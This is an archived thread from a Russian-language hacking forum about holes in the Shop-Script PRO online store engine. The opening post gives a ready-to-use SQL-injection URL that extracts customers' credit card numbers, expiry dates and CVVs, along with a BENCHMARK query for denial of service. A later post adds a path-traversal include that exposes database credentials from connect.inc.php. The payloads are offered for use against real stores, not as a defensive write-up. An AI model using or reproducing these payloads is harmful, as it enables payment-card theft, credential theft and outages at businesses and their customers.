ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
ShopScript доступ в админ панель |
05.11.2006, 13:04
|
|
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167
Репутация:
1186
|
|
ShopScript доступ в админ панель
Если в Pro версии движка интернет магазина Shop Script в браузере вбить:
http://адрес/admin.php?dpt=reports&sub=product_report&categoryI D=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
То вы сможете попасть в админку  Если Safe Mode будет отключён то можете получить полный контроль над сайтом.Этому багу подвержены версии Shop-Script PRO и Shop-Script Premium все версии.
Также возможно проведение DDos атаки путём
http://адрес/admin.php?dpt=conf&sub=setting&settings_groupID=BE NCHMARK(10000000,BENCHMARK(10000000,md5(current_da te)))
Вот пример сайта
http://www.shop-script-demo.com/pro/admin.php?dpt=reports&sub=product_report&categoryI D=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
Только тут включён SafeMod 
Последний раз редактировалось Osap1ent*; 05.11.2006 в 13:09..
|
|
|
05.11.2006, 13:17
|
|
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310
Репутация:
488
|
|
Похоже, что не ты нашел уязвимости..
|
|
|
|
05.11.2006, 13:28
|
|
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167
Репутация:
1186
|
|
Я тока насчёт DDos нашёл, а про админку я где-то в сети прочитал.Может кончно DDos уже раньше нашли)
|
|
|
|
05.11.2006, 14:13
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Может я туплю, но доступ в админку есть и так - http://www.shop-script-demo.com/pro/admin.php
Как я понял это как бы демонстрация этого самого скрипта...показывается как выглядит там админка...и все...
Поправьте, если ошибаюсь...
|
|
|
|
05.11.2006, 14:15
|
|
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167
Репутация:
1186
|
|
Хм...Да, наверно.А то чёто я смотрю больше на другие сайты так не входит
|
|
|
|
05.11.2006, 14:17
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Вот и я про тоже )
А жаль...искренне жаль )
Тему предлагаю закрыть...
|
|
|
|
05.11.2006, 14:19
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 65
Провел на форуме:
229853
Репутация:
89
|
|
/me пацталом %)))
|
|
|
|
05.11.2006, 15:36
|
|
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
жжёте парни...
|
|
|
|
05.11.2006, 17:23
|
|
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324
Репутация:
92
|
|
баянчег http://www.cyberlords.net/advisories/cl_shop.txt
|
|
|
|
25.11.2006, 02:07
|
|
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167
Репутация:
1186
|
|
Короче, единственное что я смог найти, так это данные для подключения к БД, если очень повезёт они могут подойти и к админке.
Надо только дописать
/index.php?aux_page=../cfg/connect.inc.php
Если вы перейдёте на это страничку но ничего не будет написано( если будет написано "документ не найден на сервере" то ничего не плучится) если ничего не будет, будет просто пусто на том месте где должны быть ньюски, то просто посмотрите сорцы, там будет часть кода типа
db_username=""
bd_password=""
и т.д. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
